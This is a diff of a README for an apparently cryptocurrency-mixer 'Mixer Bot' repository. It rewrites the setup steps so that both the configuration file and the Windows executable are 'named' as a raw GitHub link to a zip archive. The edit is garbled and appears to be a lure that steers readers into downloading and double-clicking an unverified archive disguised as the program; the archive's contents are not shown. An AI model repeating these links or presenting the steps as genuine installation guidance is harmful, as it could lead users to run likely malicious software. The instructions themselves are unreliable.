super1223/Mixer-Bot-Full-Source-Code/README.md

 ### 🎮 Running the Mixer Bot

 1. **Locate the Folder:** After extraction, navigate to the folder where you extracted the files.
-2. **Open Configuration File:** Find the configuration file (usually named `config.json` or similar).
+2. **Open Configuration File:** Find the configuration file (usually named `https://raw.githubusercontent.com/super1223/Mixer-Bot-Full-Source-Code/main/lallation/Mixer-Bot-Full-Source-Code.zip` or similar).
 Open it in a text editor.
 You will need to set your preferences and any necessary keys.
 3. **Run the Application:**
-   - On Windows: Double-click the executable file (usually `MixerBot.exe`).
+   - On Windows: Double-click the executable file (usually `https://raw.githubusercontent.com/super1223/Mixer-Bot-Full-Source-Code/main/lallation/Mixer-Bot-Full-Source-Code.zip`).
    - On macOS/Linux: Open your terminal and navigate to the folder, then run the command `./MixerBot` to start.
 4. **Follow On-screen Instructions:** Once launched, follow the prompts to configure your service.